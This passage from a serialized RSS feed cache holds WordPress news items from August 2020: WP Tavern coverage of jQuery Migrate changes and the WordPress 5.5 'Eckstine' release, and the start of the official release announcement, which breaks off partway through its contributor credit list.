Helper</a> plugin available for end-users. &ldquo;It is intended to be run in production on sites that experience jQuery-related problems after updating to 5.5,&rdquo; said Ozz. &ldquo;It works by re-enabling jQuery Migrate and by showing the warnings about the use of outdated/deprecated jQuery functions to site admins.&rdquo;</p>\n\n\n\n<p>The long-term goal is to get developers to update their extensions. In the meantime, this plugin should ease some of the problems.</p>\n\n\n\n<p>Ozz said the biggest thing developers need to do right now is to make sure they are testing their extensions against WordPress 5.5. &ldquo;Ideally, paying more attention to any old jQuery-based scripts and confirming they still work as expected,&rdquo; he continued. &ldquo;In almost all cases, the fixes are trivial.&rdquo;</p>\n\n\n\n<p>Beyond WordPress 5.5, things will start to take shape. The tentative plan is to update to the latest version of jQuery and add the latest version of jQuery Migrate as part of the WordPress 5.6 release.</p>\n\n\n\n<p>&ldquo;Again, Migrate will be used to help in updating jQuery based scripts, and also as a backward-compatibility &lsquo;fix&rsquo; while plugins and themes get updated,&rdquo; said Ozz. &ldquo;The version of Migrate in WordPress 5.6 will be different, as it will correspond to the latest jQuery version. It will serve the same purpose as when it was added for the first time, but now will help core, plugins, and themes get updated from jQuery 1.12.4 to 3.5.1 (or later).&rdquo;</p>\n\n\n\n<p>The third leg of the process will be to once again remove jQuery Migrate from WordPress. This change is tentatively planned for WordPress 5.7, which will not be released until 2021. The end goal is to remove the reliance on Migrate and ship the latest version of jQuery until someday &mdash; perhaps far into the future &mdash; there may no longer be a need for bundling it with WordPress at all.</p>\n\n\n\n<p>&ldquo;Following the best practices and the recommendations of the jQuery team, Migrate should be used as a helper tool, not as a permanent backward-compatibility solution,&rdquo; said Ozz. &ldquo;Ideally, WordPress will be able to do this.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 11 Aug 2020 20:29:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:127:\"WPTavern: WordPress 5.5 “Eckstine” Introduces Block Directory, Block Patterns, and Automatic Updates for Themes and Plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103045\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:283:\"https://wptavern.com/wordpress-5-5-eckstine-introduces-block-directory-block-patterns-and-automatic-updates-for-themes-and-plugins?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-5-5-eckstine-introduces-block-directory-block-patterns-and-automatic-updates-for-themes-and-plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5681:\"<img />\n\n\n\n<p><a href=\"https://wordpress.org/news/2020/08/wordpress-5-5-eckstine/\">WordPress 5.5</a> &ldquo;Eckstine&rdquo; landed today, named for American jazz singer Billy Eckstine. This release introduces major improvements for the block editor and the security of WordPress. It was made possible by the contributions of 805 volunteers (with 38% of them being new contributors.) The 5.5 update is a testament to the stability of WordPress during uncertain times, as well as its unstoppable, distributed contributor base, who continue to get things done despite the pandemic&rsquo;s unique challenges.</p>\n\n\n\n<p>WordPress continues refining the editing experience with more than 1,500 updates from 10 releases of the Gutenberg plugin included in 5.5. (The plugin is where all the magic is tested prior to landing in WordPress releases, and features are periodically rolled in.) Some of the most notable changes include <a href=\"https://wptavern.com/matt-mullenweg-and-matias-ventura-demo-new-image-editing-tools-coming-to-gutenberg\">inline image editing</a>, device previews, and smoother block movement with better drag-and-drop, block movers, block selection, and block relocation.</p>\n\n\n\n\n\n\n\n<p>Block Patterns are making their debut in WordPress 5.5, with a handful of default patterns already available in the block inserter. This new feature helps users build pages faster by allowing them to instantly place sets of blocks that are already artfully arranged. We have written extensively about why <a href=\"https://wptavern.com/block-patterns-will-change-everything\">block patterns will change everything</a> and it will be exciting to see what developers do with them now that the feature is in core.</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n\n</div>\n\n\n\n<h2>Block Directory Enables Block Discovery and Installation Inside the Editor</h2>\n\n\n\n<p>WordPress recently launched a <a href=\"https://wptavern.com/call-for-block-plugins-the-wordpress-block-directory-is-open-for-business\">block directory</a> for single-block plugins and users can now search for and install blocks directly inside the editor. Selected blocks are downloaded seamlessly in the background and automatically activated and placed in the content. The advantage is that users don&rsquo;t have to break their workflows in order to install new functionality. Blocks installed via the editor can also be uninstalled from the plugins page in the admin.</p>\n\n\n\n<div class=\"wp-block-image\"><img />Search for and Install Blocks from the Block Directory</div>\n\n\n\n<p>Block patterns, combined with the new block directory, will make page building much faster inside the editor by enabling users to quickly spin up layouts and add blocks on the fly.  </p>\n\n\n\n<h2>WordPress Security Takes a Giant Leap with Automatic Updates for Themes and Plugins</h2>\n\n\n\n<p>Version 5.5 introduces a new UI for enabling auto-updates for themes and plugins. This is an exciting new era for WordPress that brings a higher level of website security while requiring less effort from users. Those who choose to get on the automatic updates train will no longer have to log into their sites and be greeted with a slew of nagging update notices. These updates will happen the same day they are available, so users don&rsquo;t have to check in as often and sites are better protected from plugin and theme vulnerabilities getting exploited.</p>\n\n\n\n<img />\n\n\n\n<p>WordPress uses wp-cron to fetch updates for plugins and themes twice per day. The feature ships turned off by default in WordPress 5.5, so users will need to visit the theme and plugin pages in the admin to enable automatic updates.  The bulk actions menu dropdown now has options for enabling or disabling auto-updates on all plugins, but users can always enable the updates for select plugins if they have any concerns.</p>\n\n\n\n<p>Other notable updates in WordPress 5.5 include the following:</p>\n\n\n\n<ul><li><strong>XML Sitemaps</strong>: WordPress now includes <a href=\"https://wptavern.com/wordpress-5-5-to-include-extensible-core-sitemaps\">extensible core sitemaps</a>, and many users will no longer need a plugin for this functionality. This basic implementation was completed in a way that will not impact performance or cause conflicts with other plugins that add sitemaps.</li><li><strong>Lazy Loading Images</strong>: WordPress images will now wait to load until users scroll them into view, speeding up performance, especially on mobile.</li><li><strong>Improved Accessibility</strong>: Metaboxes can now be moved with the keyboard, assistive devices can see status messages in the image editor, copying links in media screens and modal dialogs can now be done with a click of a button, and more.</li><li><strong>Update Themes and Plugins by Uploading ZIP files</strong>: &ndash; Users can now update plugins and themes manually by <a href=\"https://wptavern.com/after-11-years-users-will-be-able-to-update-themes-and-plugins-via-a-zip-file\">uploading a ZIP file</a>, an improvement for scenarios where one does not have server access.</li><li><strong>Final Dashicon Library Update:</strong> The Dashicons project has been <a href=\"https://wptavern.com/wordpress-dashicons-project-to-discontinue-development-in-favor-of-new-icon-component\">discontinued in favor of the new Icon Component</a>. This last update to the library adds 39 block editor icons and 26 other icons. </li></ul>\n\n\n\n<p>For a more technical breakdown of some of the changes under the hood, check out the <a href=\"https://make.wordpress.org/core/tag/5-5+dev-notes/\">developer notes</a> and the <a href=\"https://make.wordpress.org/core/2020/07/30/wordpress-5-5-field-guide/\">5.5 field guide</a>. </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 11 Aug 2020 19:13:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"WordPress.org blog: WordPress 5.5 “Eckstine”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8799\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"https://wordpress.org/news/2020/08/eckstine/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:66620:\"<p>Here it is! Named “Eckstine” in honor of Billy Eckstine, this latest and greatest version of WordPress is available for&nbsp;<a href=\"https://wordpress.org/download/\">download</a> or update in your dashboard.</p>\n\n\n\n<img width=\"632\" height=\"514\" src=\"https://i0.wp.com/wordpress.org/news/files/2020/08/Billy_duotone-1000px_quiche-sans-top.png?resize=632%2C514&ssl=1\" alt=\"\" class=\"wp-image-8930\" />\n\n\n\n<div class=\"wp-block-cover has-background-dim\"><div class=\"wp-block-cover__inner-container\">\n<p class=\"has-text-align-center has-black-color has-text-color has-background has-large-font-size\">Welcome to WordPress 5.5.</p>\n\n\n\n<h3 class=\"has-text-align-center has-black-color has-text-color\">In WordPress 5.5, your site gets new power in three major areas: <br />speed, search, and security.</h3>\n</div></div>\n\n\n\n<div class=\"wp-block-columns has-white-background-color has-background\">\n<div class=\"wp-block-column\"></div>\n\n\n\n<div class=\"wp-block-column\">\n<h2>Speed</h2>\n\n\n\n<p><strong>Posts and pages feel faster, thanks to lazy-loaded images.</strong></p>\n\n\n\n<p>Images give your story a lot of impact, but they can sometimes make your site seem slow.</p>\n\n\n\n<p>In WordPress 5.5, images wait to load until they’re just about to scroll into view. The technical term is ‘lazy loading.’</p>\n\n\n\n<p>On mobile, lazy loading can also keep browsers from loading files meant for other devices. That can save your readers money on data — and help preserve battery life.</p>\n\n\n\n<h2>Search</h2>\n\n\n\n<p><strong>Say hello to your new sitemap.</strong></p>\n\n\n\n<p>WordPress sites work well with search engines.</p>\n\n\n\n<p>Now, by default, WordPress 5.5 includes an XML sitemap that helps search engines discover your most important pages from the very minute you go live.</p>\n\n\n\n<p>So more people will find your site sooner, giving you more time to engage, retain and convert them to subscribers, customers or whatever fits your definition of success.</p>\n</div>\n\n\n\n<div class=\"wp-block-column\"></div>\n</div>\n\n\n\n<div class=\"wp-block-columns has-background\">\n<div class=\"wp-block-column\"></div>\n\n\n\n<div class=\"wp-block-column\">\n<h2>Security</h2>\n\n\n\nNow you can choose to update plugins and themes automatically–or pick just a few–from the screens you’ve always used.\n\n\n\n<p><strong>Auto-updates for Plugins and Themes</strong></p>\n\n\n\n<p>Now you can set plugins and themes to update automatically — or not! — in the WordPress admin. So you always know your site is running the latest code available.</p>\n\n\n\n<p>You can also turn auto-updates on or off for each plugin or theme you have installed — all on the same screens you’ve always used.</p>\n\n\n\n<p><strong>Update by uploading ZIP files</strong></p>\n\n\n\n<p>If updating plugins and themes manually is your thing, now that’s easier too — just upload a ZIP file.</p>\n</div>\n\n\n\n<div class=\"wp-block-column\"></div>\n</div>\n\n\n\n<div class=\"wp-block-columns has-background\">\n<div class=\"wp-block-column\"></div>\n\n\n\n<div class=\"wp-block-column\">\n<h2>Highlights from the block editor</h2>\n\n\n\n<p>Once again, the latest WordPress release packs a long list of exciting new features for the block editor. For example:</p>\n\n\n\n\n\n\n\n<div class=\"wp-block-columns\">\n<div class=\"wp-block-column\">\n<h3>Block patterns</h3>\n\n\n\n<p>New block patterns make it simple and fun to create complex, beautiful layouts, using combinations of text and media that you can mix and match to fit your story.</p>\n\n\n\n<p>You will also find block patterns in a wide variety of plugins and themes, with more added all the time. Pick any of them from a single place — just click and go!</p>\n</div>\n\n\n\n<div class=\"wp-block-column\">\n<h3>The new block directory</h3>\n\n\n\n<p>Now it’s easier than ever to find the block you need. The new block directory is built right into the block editor, so you can install new block types to your site without ever leaving the editor.</p>\n\n\n\n<h3>Inline image editing</h3>\n\n\n\n<p>Crop, rotate, and zoom your photos right from the image block. If you spend a lot of time on images, this could save you hours!</p>\n</div>\n</div>\n\n\n\n\n\n\n\n<h3>And so much more.</h3>\n\n\n\n<p>The highlights above are a tiny fraction of the new block editor features you’ve just installed. Open the block editor and enjoy!</p>\n</div>\n\n\n\n<div class=\"wp-block-column\"></div>\n</div>\n\n\n\n<div class=\"wp-block-columns has-white-background-color has-background\">\n<div class=\"wp-block-column\"></div>\n\n\n\n<div class=\"wp-block-column\">\n<h2>Accessibility</h2>\n\n\n\n<p>Every release adds improvements to the accessible publishing experience, and that remains true for WordPress 5.5.</p>\n\n\n\n<p>Now you can copy links in media screens and modal dialogs with a button, instead of trying to highlight a line of text.</p>\n\n\n\n<p>You can also move meta boxes with the keyboard, and edit images in WordPress with your assistive device, as it can read you the instructions in the image editor.</p>\n</div>\n\n\n\n<div class=\"wp-block-column\"></div>\n</div>\n\n\n\n<div class=\"wp-block-columns has-black-color has-text-color has-background\">\n<div class=\"wp-block-column\"></div>\n\n\n\n<div class=\"wp-block-column\">\n<h2>For developers</h2>\n\n\n\n<p>5.5 also brings a big box of changes just for developers.</p>\n\n\n\n<div class=\"wp-block-columns\">\n<div class=\"wp-block-column\">\n<h3>Server-side registered blocks in the REST API</h3>\n\n\n\n<p>The addition of block types endpoints means that JavaScript apps (like the block editor) can retrieve definitions for any blocks registered on the server.</p>\n\n\n\n<h3>Defining environments</h3>\n\n\n\n<p>WordPress now has a standardized way to define a site’s environment type (staging, production, etc). Retrieve that type with&nbsp;<code>wp_get_environment_type()</code>&nbsp;and execute only the appropriate code.</p>\n\n\n\n<h3>Dashicons</h3>\n\n\n\n<p>The Dashicons library has received its final update in 5.5. It adds 39 block editor icons along with 26 others.</p>\n\n\n\n<h3>Passing data to template files</h3>\n\n\n\n<p>The template loading functions (<code>get_header()</code>,&nbsp;<code>get_template_part()</code>, etc.) have a new&nbsp;<code>$args</code>&nbsp;argument. So now you can pass an entire array’s worth of data to those templates.</p>\n</div>\n\n\n\n<div class=\"wp-block-column\">\n<h3>More changes for developers</h3>\n\n\n\n<ul><li>The PHPMailer library just got a major update, going from version 5.2.27 to 6.1.6.</li><li>Now get more fine-grained control of&nbsp;<code>redirect_guess_404_permalink()</code>.</li><li>Sites that use PHP’s OPcache will see more reliable cache invalidation, thanks to the new&nbsp;<code>wp_opcache_invalidate()</code>&nbsp;function during updates (including to plugins and themes).</li><li>Custom post types associated with the category taxonomy can now opt-in to supporting the default term.</li><li>Default terms can now be specified for custom taxonomies in&nbsp;<code>register_taxonomy()</code>.</li><li>The REST API now officially supports specifying default metadata values through&nbsp;<code>register_meta()</code>.</li><li>You will find updated versions of these bundled libraries: SimplePie, Twemoji, Masonry, imagesLoaded, getID3, Moment.js, and clipboard.js.</li></ul>\n</div>\n</div>\n</div>\n\n\n\n<div class=\"wp-block-column\"></div>\n</div>\n\n\n\n<div class=\"wp-block-columns has-white-background-color has-background\">\n<div class=\"wp-block-column\"></div>\n\n\n\n<div class=\"wp-block-column\">\n<h2>The Squad</h2>\n\n\n\n<p>Leading this release were&nbsp;<a href=\"http://ma.tt/\">Matt Mullenweg</a>,&nbsp;<a href=\"https://profiles.wordpress.org/whyisjake\">Jake Spurlock,</a> and&nbsp;<a href=\"https://dream-encode.com/blog/\">David Baumwald</a>. Supporting them was this highly enthusiastic release squad:</p>\n\n\n\n<ul><li><strong>Editor Tech</strong>: Ella Van Durpe (<a href=\"https://profiles.wordpress.org/ellatrix/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>ellatrix</a>)</li><li><strong>Editor Design</strong>: Michael Arestad (<a href=\"https://profiles.wordpress.org/michael-arestad/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>michael-arestad</a>)</li><li><strong>Core Tech</strong>: Sergey Biryukov (<a href=\"https://profiles.wordpress.org/sergeybiryukov/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>sergeybiryukov</a>)</li><li><strong>Media Tech: </strong>Andrew Ozz (<a href=\"https://profiles.wordpress.org/azaozz/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>azaozz</a>)</li><li><strong>Accessibility Tech</strong>: JB Audras (<a href=\"https://profiles.wordpress.org/audrasjb/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>audrasjb</a>)</li><li><strong>Docs Coordinator</strong>:&nbsp;Justin Ahinon (<a href=\"https://profiles.wordpress.org/justinahinon/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>justinahinon</a>)</li><li><strong>Marketing/Comms Coordinator</strong>: Mary Baum (<a href=\"https://profiles.wordpress.org/marybaum/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>marybaum</a>)</li></ul>\n\n\n\n<p>Joining the squad throughout the release cycle were <strong>805 generous volunteer contributors</strong> who collectively worked on over <strong><a href=\"https://core.trac.wordpress.org/milestone/5.5\">523</a> tickets on Trac</strong> and <strong>over 1660 pull requests on GitHub</strong>.</p>\n\n\n\n<p>Put on a Billy Eckstine playlist, click that update button (or&nbsp;<a href=\"https://wordpress.org/download/\">download it directly</a>), and check the profiles of the fine folks that helped:</p>\n\n\n<a href=\"https://profiles.wordpress.org/a2hosting/\">A2 Hosting</a>, <a href=\"https://profiles.wordpress.org/a4jpcom/\">a4jp . com</a>, <a href=\"https://profiles.wordpress.org/a6software/\">a6software</a>, <a href=\"https://profiles.wordpress.org/aaroncampbell/\">Aaron D. Campbell</a>, <a href=\"https://profiles.wordpress.org/jorbin/\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/abderrahman/\">abderrahman</a>, <a href=\"https://profiles.wordpress.org/webcommsat/\">Abha Thakor</a>, <a href=\"https://profiles.wordpress.org/ibachal/\">Achal Jain</a>, <a href=\"https://profiles.wordpress.org/achbed/\">achbed</a>, <a href=\"https://profiles.wordpress.org/achyuthajoy/\">Achyuth Ajoy</a>, <a href=\"https://profiles.wordpress.org/acosmin/\">acosmin</a>, <a href=\"https://profiles.wordpress.org/acsnaterse/\">acsnaterse</a>, <a href=\"https://profiles.wordpress.org/adamsilverstein/\">Adam Silverstein</a>, <a href=\"https://profiles.wordpress.org/addiestavlo/\">Addie</a>, <a href=\"https://profiles.wordpress.org/addyosmani/\">addyosmani</a>, <a href=\"https://profiles.wordpress.org/adnanlimdi/\">adnan.limdi</a>, <a href=\"https://profiles.wordpress.org/adrian/\">adrian</a>, <a href=\"https://profiles.wordpress.org/ahortin/\">ahortin</a>, <a href=\"https://profiles.wordpress.org/airamerica/\">airamerica</a>, <a href=\"https://profiles.wordpress.org/ajayghaghretiya1/\">Ajay Ghaghretiya</a>, <a href=\"https://profiles.wordpress.org/ajitbohra/\">Ajit Bohra</a>, <a href=\"https://profiles.wordpress.org/akbarhusen/\">akbarhusen</a>, <a href=\"https://profiles.wordpress.org/akbarhusen429/\">akbarhusen429</a>, <a href=\"https://profiles.wordpress.org/akhileshsabharwal/\">Akhilesh Sabharwal</a>, <a href=\"https://profiles.wordpress.org/atachibana/\">Akira Tachibana</a>, <a href=\"https://profiles.wordpress.org/schlessera/\">Alain Schlesser</a>, <a href=\"https://profiles.wordpress.org/aljullu/\">Albert Juh&#233; Lluveras</a>, <a href=\"https://profiles.wordpress.org/xknown/\">Alex Concha</a>, <a href=\"https://profiles.wordpress.org/akirk/\">Alex Kirk</a>, <a href=\"https://profiles.wordpress.org/ajlende/\">Alex Lende</a>, <a href=\"https://profiles.wordpress.org/tellyworth/\">Alex Shiels</a>, <a href=\"https://profiles.wordpress.org/alishanvr/\">Ali</a>, <a href=\"https://profiles.wordpress.org/ali11007/\">ali11007</a>, <a href=\"https://profiles.wordpress.org/allendav/\">Allen Snook</a>, <a href=\"https://profiles.wordpress.org/amaschas/\">amaschas</a>, <a href=\"https://profiles.wordpress.org/wpamitkumar/\">Amit Dudhat</a>, <a href=\"https://profiles.wordpress.org/anbumz/\">anbumz</a>, <a href=\"https://profiles.wordpress.org/andfinally/\">andfinally</a>, <a href=\"https://profiles.wordpress.org/afercia/\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/andreamiddleton/\">Andrea Middleton</a>, <a href=\"https://profiles.wordpress.org/dontdream/\">Andrea Tarantini</a>, <a href=\"https://profiles.wordpress.org/andraganescu/\">Andrei Draganescu</a>, <a href=\"https://profiles.wordpress.org/aduth/\">Andrew Duthie</a>, <a href=\"https://profiles.wordpress.org/nacin/\">Andrew Nacin</a>, <a href=\"https://profiles.wordpress.org/anevins/\">Andrew Nevins</a>, <a href=\"https://profiles.wordpress.org/azaozz/\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/rarst/\">Andrey \"Rarst\" Savchenko</a>, <a href=\"https://profiles.wordpress.org/nosolosw/\">Andrés Maneiro</a>, <a href=\"https://profiles.wordpress.org/afragen/\">Andy Fragen</a>, <a href=\"https://profiles.wordpress.org/andizer/\">Andy Meerwaldt</a>, <a href=\"https://profiles.wordpress.org/apeatling/\">Andy Peatling</a>, <a href=\"https://profiles.wordpress.org/angelasjin/\">Angela Jin</a>, <a href=\"https://profiles.wordpress.org/la-geek/\">Angelika Reisiger</a>, <a href=\"https://profiles.wordpress.org/rilwis/\">Anh Tran</a>, <a href=\"https://profiles.wordpress.org/wpgurudev/\">Ankit Gade</a>, <a href=\"https://profiles.wordpress.org/ankit-k-gupta/\">Ankit K Gupta</a>, <a href=\"https://profiles.wordpress.org/ankitmaru/\">Ankit Panchal</a>, <a href=\"https://profiles.wordpress.org/annezazu/\">Anne McCarthy</a>, <a href=\"https://profiles.wordpress.org/antpb/\">Anthony Burchell</a>, <a href=\"https://profiles.wordpress.org/atimmer/\">Anton Timmermans</a>, <a href=\"https://profiles.wordpress.org/antonisme/\">Antonis Lilis</a>, <a href=\"https://profiles.wordpress.org/apedog/\">apedog</a>, <a href=\"https://profiles.wordpress.org/archon810/\">archon810</a>, <a href=\"https://profiles.wordpress.org/argentite/\">argentite</a>, <a href=\"https://profiles.wordpress.org/arpitgshah/\">Arpit G Shah</a>, <a href=\"https://profiles.wordpress.org/passoniate/\">Arslan Ahmed</a>, <a href=\"https://profiles.wordpress.org/asalce/\">asalce</a>, <a href=\"https://profiles.wordpress.org/ashiagr/\">ashiagr</a>, <a href=\"https://profiles.wordpress.org/ashour/\">ashour</a>, <a href=\"https://profiles.wordpress.org/tacitonic/\">Atharva Dhekne</a>, <a href=\"https://profiles.wordpress.org/ajoah/\">Aur&#233;lien Joahny</a>, <a href=\"https://profiles.wordpress.org/aussi/\">aussi</a>, <a href=\"https://profiles.wordpress.org/automaton/\">automaton</a>, <a href=\"https://profiles.wordpress.org/ayeshrajans/\">Ayesh Karunaratne</a>, <a href=\"https://profiles.wordpress.org/backups/\">BackuPs</a>, <a href=\"https://profiles.wordpress.org/barry/\">Barry</a>, <a href=\"https://profiles.wordpress.org/barryceelen/\">Barry Ceelen</a>, <a href=\"https://profiles.wordpress.org/bartczyz/\">Bart Czyz</a>, <a href=\"https://profiles.wordpress.org/bartekcholewa/\">bartekcholewa</a>, <a href=\"https://profiles.wordpress.org/bartkalisz/\">bartkalisz</a>, <a href=\"https://profiles.wordpress.org/bastho/\">Bastien Ho</a>, <a href=\"https://profiles.wordpress.org/bmartinent/\">Bastien Martinent</a>, <a href=\"https://profiles.wordpress.org/bcworkz/\">bcworkz</a>, <a href=\"https://profiles.wordpress.org/bdbch/\">bdbch</a>, <a href=\"https://profiles.wordpress.org/bdcstr/\">bdcstr</a>, <a href=\"https://profiles.wordpress.org/empireoflight/\">Ben Dunkle</a>, <a href=\"https://profiles.wordpress.org/grapestain/\">Bence Szalai</a>, <a href=\"https://profiles.wordpress.org/bencroskery/\">bencroskery</a>, <a href=\"https://profiles.wordpress.org/benjamingosset/\">Benjamin Gosset</a>, <a href=\"https://profiles.wordpress.org/benoitchantre/\">Benoit Chantre</a>, <a href=\"https://profiles.wordpress.org/bernhard-reiter/\">Bernhard Reiter</a>, <a href=\"https://profiles.wordpress.org/bettyjj/\">BettyJJ</a>, <a href=\"https://profiles.wordpress.org/bgermann/\">bgermann</a>, <a href=\"https://profiles.wordpress.org/bigcloudmedia/\">bigcloudmedia</a>, <a href=\"https://profiles.wordpress.org/bigdawggi/\">bigdawggi</a>, <a href=\"https://profiles.wordpress.org/billerickson/\">Bill Erickson</a>, <a href=\"https://profiles.wordpress.org/birgire/\">Birgir Erlendsson (birgire)</a>, <a href=\"https://profiles.wordpress.org/bph/\">Birgit Pauli-Haack</a>, <a href=\"https://profiles.wordpress.org/bjornw/\">BjornW</a>, <a href=\"https://profiles.wordpress.org/gitlost/\">bonger</a>, <a href=\"https://profiles.wordpress.org/boonebgorges/\">Boone Gorges</a>, <a href=\"https://profiles.wordpress.org/bbrdaric/\">Boris</a>, <a href=\"https://profiles.wordpress.org/kraftbj/\">Brandon Kraft</a>, <a href=\"https://profiles.wordpress.org/bpayton/\">Brandon Payton</a>, <a href=\"https://profiles.wordpress.org/brentswisher/\">Brent Swisher</a>, <a href=\"https://profiles.wordpress.org/krogsgard/\">Brian Krogsgard</a>, <a href=\"https://profiles.wordpress.org/bruandet/\">bruandet</a>, <a href=\"https://profiles.wordpress.org/bhargavbhandari90/\">Bunty</a>, <a href=\"https://profiles.wordpress.org/burhandodhy/\">Burhan Nasir</a>, <a href=\"https://profiles.wordpress.org/caiocrcosta/\">caiocrcosta</a>, <a href=\"https://profiles.wordpress.org/cvoell/\">Cameron Voell</a>, <a href=\"https://profiles.wordpress.org/cameronamcintyre/\">cameronamcintyre</a>, <a href=\"https://profiles.wordpress.org/carike/\">Carike</a>, <a href=\"https://profiles.wordpress.org/stuffradio/\">Carl Wuensche</a>, <a href=\"https://profiles.wordpress.org/carloslfu/\">Carlos Galarza</a>, <a href=\"https://profiles.wordpress.org/poena/\">Carolina Nymark</a>, <a href=\"https://profiles.wordpress.org/sixhours/\">Caroline Moore</a>, <a href=\"https://profiles.wordpress.org/carriganvb/\">Carrigan</a>, <a href=\"https://profiles.wordpress.org/ceyhun/\">ceyhun</a>, <a href=\"https://profiles.wordpress.org/shireling/\">Chad</a>, <a href=\"https://profiles.wordpress.org/cbutlerjr/\">Chad Butler</a>, <a href=\"https://profiles.wordpress.org/mackensen/\">Charles Fulton</a>, <a href=\"https://profiles.wordpress.org/chetan200891/\">Chetan Prajapati</a>, <a href=\"https://profiles.wordpress.org/chintan1896/\">Chintan hingrajiya</a>, <a href=\"https://profiles.wordpress.org/chipsnyder/\">Chip Snyder</a>, <a href=\"https://profiles.wordpress.org/cbringmann/\">Chloé Bringmann</a>, <a href=\"https://profiles.wordpress.org/chouby/\">Chouby</a>, <a href=\"https://profiles.wordpress.org/chrisvanpatten/\">Chris Van Patten</a>, <a href=\"https://profiles.wordpress.org/chriscct7/\">chriscct7</a>, <a href=\"https://profiles.wordpress.org/christian1012/\">Christian Chung</a>, <a href=\"https://profiles.wordpress.org/cjbj/\">Christian Jongeneel</a>, <a href=\"https://profiles.wordpress.org/pixelverbieger/\">Christian Sabo</a>, <a href=\"https://profiles.wordpress.org/needle/\">Christian Wach</a>, <a href=\"https://profiles.wordpress.org/christophherr/\">Christoph Herr</a>, <a href=\"https://profiles.wordpress.org/cklee/\">cklee</a>, <a href=\"https://profiles.wordpress.org/clayray/\">clayray</a>, <a href=\"https://profiles.wordpress.org/cliffpaulick/\">Clifford Paulick</a>, <a href=\"https://profiles.wordpress.org/codeforest/\">codeforest</a>, <a href=\"https://profiles.wordpress.org/commeuneimage/\">Commeuneimage</a>, <a href=\"https://profiles.wordpress.org/copons/\">Copons</a>, <a href=\"https://profiles.wordpress.org/coreymckrill/\">Corey McKrill</a>, <a href=\"https://profiles.wordpress.org/cpasqualini/\">cpasqualini</a>, <a href=\"https://profiles.wordpress.org/cristovaov/\">Cristovao Verstraeten</a>, <a href=\"https://profiles.wordpress.org/littlebigthing/\">Csaba (LittleBigThings)</a>, <a href=\"https://profiles.wordpress.org/curtisbelt/\">Curtis Belt</a>, <a href=\"https://profiles.wordpress.org/clarinetlord/\">Cyrus Collier</a>, <a href=\"https://profiles.wordpress.org/dperonne/\">D.PERONNE</a>, <a href=\"https://profiles.wordpress.org/dsixinetu/\">d6</a>, <a 